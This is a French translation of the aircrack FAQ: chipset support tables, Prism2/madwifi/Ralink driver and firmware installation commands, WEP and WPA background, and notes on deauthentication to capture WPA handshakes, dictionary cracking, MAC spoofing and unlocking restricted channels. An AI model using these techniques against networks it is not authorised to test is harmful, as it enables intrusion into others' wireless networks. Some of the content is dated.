Premierement utilisez google pour trouver le chipset de votre carte. Par exemple, si vous possedez
une WPC54G : "wpc54g chipset linux".

Supportée par Supportée par


Supportée par
Chipset airodump sous airodump sous
aireplay sous Linux ?
Windows ? Linux ?

OUI (driver patché NON (le firmwar


HermesI OUI (driver Agere) corrompt l'adresse
orinoco)
MAC)
OUI (HostAP ou wlan-
NON mais voir OUI (PCI et CardBus
ng driver), STA
Prism2/3 LinkFerret pour uniquement, mise à
firmware 1.5.6 ou jour driver requise)
une alternative
plus recent requis
FullMAC: OUI (prism54
OUI (PrismGT OUI (mise a jour du
PrismGT driver, SoftMAC: Pas
driver) driver recommandée)
encor(prism54usb)

CardBus: OUI
OUI (PCI et CardBus
(Atheros driver), OUI (mise a jour du
Atheros uniquement, driver
PCI: NON (voir driver recommandée)
madwifi)
CommView WiFi)

OUI (Realtek OUI (rtl8180-sa2400 UNSTABLE (mise a jour


RTL8180
driver) driver) du driver requise)

OUI (airo driver,


Aironet OUI? (Cisco driver) firmware 4.25.30 NON (firmware issue)
recommended)

OUI (rt2500 / rt2570 OUI (mise a jour du


Ralink NON
driver) driver requise)

PARTIAL: ipw2100
Centrino b NON driver ne reconnais pas NON
les paquets corrompus
OUI (ipw2200 driver, NON (le firmware perd
Centrino b/g NON
1.0.6 recommendé) des paquets)
NOT YET (bcm43xx
Old models only
Broadcom driver, Linux >= 2.6.14 NON
(BRCM driver)
requit)

TI (ACX100 / PAS TESTE (acx100


NON NON
ACX111) driver)

ZyDAS 1201 NON OUI (zd1211 driver) NON


Others (Marvel...) NON INCONNU NON

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0
Il y a actuellement 45 visiteur(s) connecté(s) !
Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Quelle est la meilleure carte à acheter?
Voici une selection de cartes recommandées: ici

De nos jour, le meilleur chipset est Atheros; il est très bien supporté sous linux, mais également
sous Windows (PCMCIA/CardBus uniquement). Les dernières mise à jour madwifi rendent possible
l'injection brut de paquet 802.11 (arbitrairement en b/g) en mode Managed (controlé) ou Monitor.

Ralink fabrique de bon chipset b/g, et a été très coopératif avec la communauté open source pour
distribuer des pilotes GPL. L'injection de paquets est donc entièrement supporté sous linux sur les
cartes PCI/CardBus RT2500, elle fonctionne également sur les péripheriques USB RT2570.

Voici une liste des cartes recommandées :

supporté supporté
Nom de
Type Chipset Antenne Prix par par Ou l'acheter ?
la carte
Windows Linux
MSI
PCI Ralink RP-SMA E30 Non Oui
PC54G2
MSI
CardBus Ralink Interne E30 Non Oui
CB54G2
Linksys
WMP54G PCI Ralink RP-SMA E40 Non Oui
v4
Linksys
WUSB54G USB Ralink Interne E40 Non Oui
v4
D-Link
DWL- USB Ralink Interne E45 Non Oui
G122
Netgear PrismGT
USB Interne E40 airodump Non
WG111 SoftMAC
Netgear CommView
PCI Atheros RP-SMA E50 Oui
WG311T WiFi
Netgear
CardBus Atheros Interne E50 airodump Oui
WG511T
Netgear
CardBus Atheros Interne E100 airodump Oui
WAG511
Proxim MC +
CardBus Atheros E110 airodump Oui
8470-WD Int.

Note: il y a quelques modèles meilleur marché avec un nom semblable (WG511, WG311, DWL-G520
+ ...); ces cartes ne sont pas basées sur un chipset Atheros. En outre les nouvelles cartes Atheros
ne sont pas supportées par les pilotes Peek, vous serez donc contraint d'utiliser CommView WiFi à la
place .

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0
Il y a actuellement 45 visiteur(s) connecté(s) !
Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Comment mettre à jour mon firmware Prism2 ?
Le plus simple est de mettre à jour le firmware avec WinUpdate - Vous devez cependant avoir le
pilote WPC11 v2.5 installé. Vous pouvez les trouvez tout deux ici: wlan/linux/prism2/.

Vous pouvez également mettre à jour le firmware en patchant HostAP (voir ci-apres pour les
instruction pour patcher et installer HostAP). Une autre solution serait de lancer le Live CD Troppix
(il possède déja les drivers hostap patchés et l'utilitaire prism2_srec).

Maintenant que HostAP est charger, vous pouvez vérifier la versions principale du firmware puis celle
de la station avec cette commande:

# dmesg | grep wifi


hostap_cs: Registered netdevice wifi0
wifi0: NIC: id=0x800c v1.0.0
wifi0: PRI: id=0x15 v1.1.1 (Le firmware principal: 1.1.1)
wifi0: STA: id=0x1f v1.7.4 (Le firmware de la station: 1.7.4)
wifi0: registered netdevice wlan0

Si l'identifiant NIC (id) du dessus est compris entre 0x8002 et 0x8008, vous possédez une ancienne
Prism2 et vous devez utiliser la version 1.5.6 du firmware STA (s1010506.hex). Sinon, vous devrez
employer, PRI 1.1.1 / STA 1.7.4 qui sont les firmwares les plus stables pour les nouvelles cartes
Prism2. N'utilisez PAS les firmware 1.7.1 or 1.8.x, certaines personnes ont ont rapporté avoir des
ennuis avec.

Pour mettre à jour le firmware, vous allez avoir besoin de prism2_srec contenu dans le pack hostap-
utils; Si jamais il n'était pas present sur votre system, télécharger et compilez le:

wget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/prism2/hostap-
utils-0.4.0.tar.gz
tar -xvzf hostap-utils-0.4.0.tar.gz
cd hostap-utils-0.4.0
make

Certaines cartes Prism2 sont limitées à certains canaux en raison des reglementations du pays. Vous
pouvez activer les 14 canaux avec les commandes suivantes:

./prism2_srec wlan0 -D > pda; cp pda pda.bak


Edit pda and put 3FFF at offset 0104 (line 24)

Pour finir, telechargez le firmware et flashez votre carte. Si l'identifiant NIC est compris entre
0x8002 et 0x8008:

wget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/prism2/s1010506.
hex
./prism2_srec -v -f wlan0 s1010506.hex -P pda

Sinon:

wget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/prism2/pk010101.
hex
wget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/prism2/sf010704.
hex
./prism2_srec -v -f wlan0 pk010101.hex sf010704.hex -P pda

Si vous obtenez le message "ioctl[PRISM2_IOCTL_HOSTAPD]: Operation not supported", le


pilote HostAP n'est pas chargé et vous devez le réinstaller. Si vous obtenez le message "ioctl
[PRISM2_IOCTL_DOWNLOAD]: Operation not supported", dans ce cas votre pilote n'a pas été mise
à jour pour le support des téléchargement non-volatiles.

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0
Il y a actuellement 46 visiteur(s) connecté(s) !
Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Installer le pilote driver madwifi (cartes Atheros)
Note 1: vous aurez besoin de uudecode provenant du pack sharutils.

Note 2: Le patch 20051025 devrait fonctionner avec les nouvelles versions du madwifi CVS.

Note 3: Si vous utilisez wpa_supplicant, vous devrez le recompiler (les vieilles versions ne sont pas compatibles
avec l'actuel madwifi CVS), et assurez vous que CONFIG_DRIVER_MADWIFI=y soit décommenté dans config.h.

Note 4: Avec le madwifi actuel, ce n'est plus la peine de lancer "iwpriv ath0 mode 2", depuis que les drivers
autorisent l'injection en mode 0 utilisant la nouvelle interface athXraw.

Modes autorisés Environnement


Mode 0 Automatique (a/b/g)
Mode 1 802.11a uniquement
Mode 2 802.11b uniquement
Mode 3 802.11g uniquement

ifconfig ath0 down


rmmod wlan_wep ath_rate_sample ath_rate_onoe \
ath_pci wlan ath_hal 2>/dev/null

find /lib/modules -name 'ath*' -exec rm -v {} \; 2>/dev/null


find /lib/modules -name 'wlan*' -exec rm -v {} \; 2>/dev/null
cd /usr/src
wget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/atheros/madwifi-cvs-
20051025.tgz
wget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/madwifi-cvs-
20051025.patch
tar -xvzf madwifi-cvs-20051025.tgz
cd madwifi-cvs-20051025
patch -Np1 -i ../madwifi-cvs-20051025.patch
make KERNELPATH=/usr/src/linux-<insert version>
make install
modprobe ath_pci

Il est maintenant possible de choisir la puissance d'emission avec madwifi (rt2570 également). La puissance
recommandé est 5.5 Mbps, mais vous pouvez l'augmenter ou la diminuer, suivant la distance vous séparant de
l'AP. Par exemple:

iwconfig ath0 rate 24M

Modulation Taux autorisées


DSSS / CCK 1M, 2M, 5.5M, 11M
OFDM (a/g) 6M, 9M, 12M, 24M, 36M, 48M, 54M

Lors de l'utilisation des attaques 2, 3 et 4, en changeant le nombre de paquets par seconde envoyés par
aireplay (option -x) cela peut parfois aider à obtenir de meilleurs resultats; le réglage par defaut est de 500 pps.

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0
Il y a actuellement 46 visiteur(s) connecté(s) !
Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Installation des pilotes / drivers prism54 (Cartes PrismGT FullMAC)
ifconfig eth1 down
rmmod prism54

cd /usr/src
wget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/prismgt/prism54-svn-
20050724.tgz
wget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/prism54-svn-
20050724.patch
tar -xvzf prism54-svn-20050724.tgz
cd prism54-svn-20050724
patch -Np1 -i ../prism54-svn-20050724.patch
make modules && make install
wget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/prismgt/1.0.4.3.arm
mkdir -p /usr/lib/hotplug/firmware
mkdir -p /lib/firmware
cp 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890
mv 1.0.4.3.arm /lib/firmware/isl3890
depmod -a

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 46 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Installation des pilotes / drivers HostAP (Cartes Prism2)
ifconfig wlan0 down
wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
/etc/init.d/CardBus stop
rmmod prism2_pci
rmmod hostap_pci

cd /usr/src
wget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/prism2/hostap-driver-
0.4.5.tar.gz
wget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/hostap-driver-
0.3.9.patch
tar -xvzf hostap-driver-0.4.5.tar.gz
cd hostap-driver-0.4.5
patch -Np1 -i ../hostap-driver-0.3.9.patch
make && make install
mv -f /etc/pcmcia/wlan-ng.conf /etc/pcmcia/wlan-ng.conf~
/etc/init.d/pcmcia start
modprobe hostap_pci &>/dev/null

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 46 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Installation des pilotes / drivers wlan-ng (Cartes Prism2)
Note importante: lorsque la carte est insérée, wlan-ng va flasher le firmware dans la RAM (volatile) avec les
version PRI 1.1.4 et STA 1.8.3. Beaucoup de problèmes semblent apparaitrent avec cette opération, c'est
pourquoi il est plus sûr d'employer juste le hostap. En outre, HostAP fonctionne plus sûrement et soutient
l'iwconfig tandis que wlan-NG non

ifconfig wlan0 down


wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable
/etc/init.d/pcmcia stop
rmmod prism2_pci
rmmod hostap_pci
find /lib/modules \( -name p80211* -o -name prism2* \) \
-exec rm -v {} \;

cd /usr/src
wget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/prism2/wlanng-0.2.1-pre26.
tar.gz
wget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/wlanng-0.2.1-pre26.
patch
tar -xvzf wlanng-0.2.1-pre26.tar.gz
cd wlanng-0.2.1-pre26
patch -Np1 -i ../wlanng-0.2.1-pre26.patch
make config && make all && make install
mv /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~
/etc/init.d/pcmcia start
modprobe prism2_pci &>/dev/null

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 47 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Installation des pilotes / drivers r8180-sa2400 (Cartes RTL8180)
ifconfig wlan0 down
rmmod r8180

cd /usr/src
wget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/rtl8180/rtl8180-0.21.tar.gz
wget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/patches/rtl8180-0.21.patch
tar -xvzf rtl8180-0.21.tar.gz
cd rtl8180-0.21
patch -Np1 -i ../rtl8180-0.21.patch
make && make install
depmod -a
modprobe r8180

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 47 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Installation des pilotes / drivers rt2500 (Ralink b/g PCI/CardBus)
ifconfig ra0 down
rmmod rt2500

cd /usr/src
wget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/ralink/rt2500-cvs-20051112.
tgz
tar -xvzf rt2500-cvs-20051112.tgz
cd rt2500-cvs-20051112
cd Module
make && make install
modprobe rt2500

Assurez vous de charger les drivers avec modprobe (pas insmod) et de mettre la carte en mode Monitor avant
de démarrer l'interface.

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 47 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Installation des pilotes / drivers rt2570 (Ralink b/g USB)
ifconfig rausb0 down
rmmod rt2570

cd /usr/src
wget http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/linux/ralink/rt2570-cvs-20051112.
tgz
tar -xvzf rt2570-cvs-20051112.tgz
cd rt2570-cvs-20051112
cd Module
make && make install
modprobe rt2570

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 47 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, voir l'original de cette pagetutos


ici
et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Le driver ne se compile pas.
Ceci se produit en principe car vos entêtes linux ne corresponde pas au noyau utilisé. Dans ce cas
recompilez simplement un nouveau noyau, installez le et redémarrez. Ensuite retentez la
compilation du pilote.

Regardez ce HOWTO pour plus de details au sujet de la compilation du noyau.

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 48 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Je possede une carte Prism2, mais airodump / aireplay ne semblent pas
fonctionner !
Premièrement, assurez vous que vous n'utilisez pas de pilotes orinoco. Si le nom de l'interface est
wlan0, alors le pilote est HostAP ou wlan-ng. Cependant si le nom de l'interface est eth0 ou eth,
alors il s'agit du pilote orinoco et vous devez le désactiver (Utilisez la commande cardctl pour
identifier le constructeur de votre materiel, ensuite éditez /etc/pcmcia/config, remplacez orinoco_cs
par hostap_cs et redémarrez cardmgr).

Cependant, il peut également s'agir d'un problème de firmware. Les anciens firmwares ont quelques
soucis avec le mode test 0x0A (utilisé par les patchs d'injection HostAP / wlan-ng), assurez vous
donc que les votres sont à jour -- Regardez ci dessous pour les instructions. La version
recommandée du pilote de la station est la version 1.7.4. Si jamais cela ne fonctionnait pas très bien
(kismet ou airodump fige/stop après la capture de quelques paquets), essayez à la place STA 1.5.6
(Soit s1010506.hex pour les anciennes cartes Prism2, soit sf010506.hex pour les plus récentes).

Parralellement le mode de test 0x0A est quelque chose d'assez instable avec les pilotes wlan-ng. Si
la carte semble se bloquer, vous devez la redémarrer ou utiliser HostAP à la place. L'injection est
actuellement impossible sur les materiels usb avec un chipset prism2 ou wlan-ng.

Note: Vous pouvez trouver un driver Windows XP pour les cartes Prism2 supportant le WPA/TKIP ici:
wpc11v3.0_wpa_dr.exe.

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 48 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, voir l'original de cette pagetutos


ici
et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Je possede une carte Atheros, et le patch madwifi fait planter le kernel /
aireplay continue de me dire que le support amélioré du RTC n'est pas
disponible
Il y a pas mal de problèmes avec quelques versions de la branche linux 2.6 (particulierement avant
que la 2.6.11 ne soit distribuée) qui provoquent un plantage du noyau lors de l'injection avec
madwifi. Ainsi sur certain noyau 2.6 le support amélioré RTC est simplement coupé. Il est donc fort
recommandé d'utiliser linux 2.6.11.x ou plus récent.

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 49 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, voir l'original de cette pagetutos


ici
et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Comment puis-je craquer un reseau WPA-PSK ?
Vous devez "écouter" juqsqu'a ce qu'une interconnexion (handshake) entre un client et l'AP se
produise. Pour forcer le client à se reautentifier, vous pouvez démarrer une attaque par
desautentification avec airplay. En outre, un bon dictionnaire est exigé ; voyez
http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/

FYI, il n'est pas possible de calculer a l'avance de grandes tables de "Pairwise Master Keys" comme
le fait rainbowcrack, depuis que la passphrase calculée avec le ESSID.

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 49 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

WZCOOK retrouve-t-il les clefs WPA ?
WZCOOK va afficher le PMK (Pairwise Master Key), une valeur de 256-bit qui est le resultat de la
passphrase haché 8192 fois ainsi que l'ESSID et la longueur du ESSID. La passphrase elle même ne
peut etre retrouvée-- cependant, le fait de connaitre le PMK est suffisant pour se connecter à un
reseau sans fil avec wpa_supplicant (voir le Windows README). Votre configuration
wpa_supplicant.conf devrait ressembler a ceci:

network={
ssid="mon_essid"
pmk=5c9597f3c8245907ea71a89d[...]9d39d08e
}

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 49 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, voir l'original de cette pagetutos


ici
et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Le WPA va-t-il etre cracker dans le futur ?
Il y a tres peu de chance que le WPA soit cassé comme l'a été le WEP

Le plus gros probleme avec le WEP est que la cle partagées est inclus dans les IVs; le resultat est
directement employé pour alimenter RC4. Cette construction excessivement simple est enclin à une
attaque statistique, puisque les premiers bytes de texte chiffré sont fortement corrélés avec la clef
partagée (voir Andrew Roos' paper). l y a fondamentalement deux contre-mesures contre cette
attaque : 1. mélangez l'IV et la clef partagée en utilisant une fonction de hash ou 2. jettez les 256
premiers bytes de RC4's.

Il y a eu pas mal de désinformation dans les nouvelles au sujet des "failles" de TKIP :

Pour le moment, TKIP est raisonnablement sécurisé mais il se fonde toujours sur le
même algorithme RC4 sur lequel WEP s'est fondé.

En fait, TKIP (WPA1) n'est pas vulnérable : pour chaque paquet, le 48-bit IV est mélangé à la clef
128-bit par paires temporelle pour créer une clef de 104-bit RC4, ainsi il n'y a aucune corelation
statistique. En outre, WPA fournit des contre-mesures contre des attaques actives (reinjection du
trafic), inclut un code plus fort d'intégrité de message (Michael), et a un protocole très robuste
d'authentification (le handshake 4-way). La seule vulnérabilité est jusqu'ici une attaque par
dictionnaire, qui échoue si le passphrase est assez robuste.

WPA2 (aka 802.11i) est exactement le même que WPA1, sauf que CCMP (AES en contre- mode) est
employé au lieu de RC4 et que HMAC-SHA1 est employé au lieu de HMAC-MD5 pour l'EAPOL MIC.
WPA2 est un peu meilleur que WPA1, mais ni l'un ni l'autre ne vont être cracker dans un proche
avenir.

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 49 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, voir l'original de cette pagetutos


ici
et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Comment savoir si ma clef WEP est correct ?
Il y a 2 mode d'authentification pour le WEP

● Authentifivcation Open-System : il s'agit du mode par defaut. Tout les clients sont accéptés
par l'AP et la clef n'est jamais controlée: on accorde toujours l'association. Cependant si
votre clef est incorrecte vous ne pourrez pas recevoir ou envoyer des paquets (parce que le
déchiffrage échouera), ainsi DHCP, ping ... seront time-out

● Authentification par partage de clef "Shared-Key": Le client doit chiffrer quelquechose avant
que l'AP ne lui accorde l'association. Ce mode est défectueux et mène au rétablissement du
keystream, ainsi il n'est jamais activé par défaut.

En résumé, le fait que vous semblez vous être relié avec succès au point d'accès ne signifie pas que
votre clef de WEP est correcte ! Pour vérifier votre clef WEP, essayez de déchiffrer un fichier de
capture avec airdecap ou avec ethereal.

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 49 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, voir l'original de cette pagetutos


ici
et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Pas moyen de cracker cet AP !
Il y a eu une coquille .

Passez faire un tour sur le forum on tentera de vous dépanner


Indiquez bien les plus de renseignements possible:
Type d'ap, carte wifi, pilote, chipset, sys d'exploitation ...

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 49 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Comment retrouver mes clef wep sous Windows ?
Vous pouvez utiliser le programme WZCOOK qui permet de retrouver les clef WEP à partir de
l'utilitaire de configuration sans fil de XP. Ceci est un programme experimental et il risque de ne pas
fonctionner suivant votre service pack.

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 49 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, voir l'original de cette pagetutos


ici
et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Comment puis-je changer l'adresse mac de ma carte wifi?
Sous Linux: par exemple , si vous avez unes carte Atheros:

ifconfig ath0 down


ifconfig ath0 hw ether 00:11:22:33:44:55
ifconfig ath0 up

Sous Windows, vous pouvez utiliser macmakeup ou etherchange.

Voir le tutorial pour des exemples

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 49 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Puis-je utiliser Ethereal pour capturer des paquets 802.11?
Sous Linux, configurez simplement votre carte en mode monitor avec le script airmon.sh. Sous
windows, Ethereal ne peut pas capturer de paquets 802.11.

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 49 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, original tutos Voir le tutorial


et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

Ethereal peut-il decoder les paquets de données WEP ?
OUi. Allez dans Edit -> Preferences -> Protocols -> IEEE 802.11, selectionnez 1 comme valeure de
"WEP key count" et rentrez votre clef wep.

Voir l'exemple ici

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 49 visiteur(s) connecté(s) !


Accueil
Proposez vous aussi vos

● Tuto Traduction française, voir l'original de cette pagetutos


ici
et publiez les sur le site !
● A venir
● Vidéos Documentation de aircrack
● Forum retour a l'index de la doc
● Chat irc
A propos

J'ai trouver la clef, comment decrypter le fichier de capture ?
Vous pouvez utiliser le programme airdecap :

utilisation: airdecap [options] <pcap file>

-l : ne pas enlever le header 802.11


-b bssid : filtre MAC d'AP
-k pmk : WPA Pairwise Master Key en hex
-e essid : Identifiant ascci du reseau cible
-p pass : passphrase WPA du reseau cible
-w key : passphrase WEP du reseau cible en hex
exemples:

airdecap -b 00:09:5B:10:BC:5A open-network.cap


airdecap -w 11A3E229084349BC25D97E2939 wep.cap
airdecap -e 'le ssid' -p passphrase tkip.cap

Tutoriaux photoshop
© Copyright 2005-2006 Tuto-fr.com par Billyboylindien
Déclaré à la cnil: Dossier n° 1142196
Rc v2.0

Il y a actuellement 49 visiteur(s) connecté(s) !